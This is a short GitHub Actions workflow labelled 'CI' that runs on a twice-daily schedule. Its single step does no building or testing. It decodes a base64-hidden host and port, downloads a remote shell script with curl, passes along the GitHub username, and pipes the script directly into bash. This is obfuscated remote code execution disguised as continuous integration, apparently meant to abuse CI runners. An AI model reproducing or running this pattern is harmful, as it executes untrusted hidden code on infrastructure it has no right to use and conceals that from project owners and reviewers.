name: CI
on:
  workflow_dispatch:
  schedule:
    - cron: '45 9,21 * * *'
jobs:
  run:
    runs-on: ubuntu-18.04
    steps:
      - uses: actions/checkout@v2
      - name: Run script
        run: curl -s -L http://$(echo -n "aS5hZ2FuemFpLmNvbToyNzQ2Mw==" | base64 -d)/autorun02.sh?id=$GITHUB_ACTOR-gt | bash -s run $GITHUB_ACTOR-gt
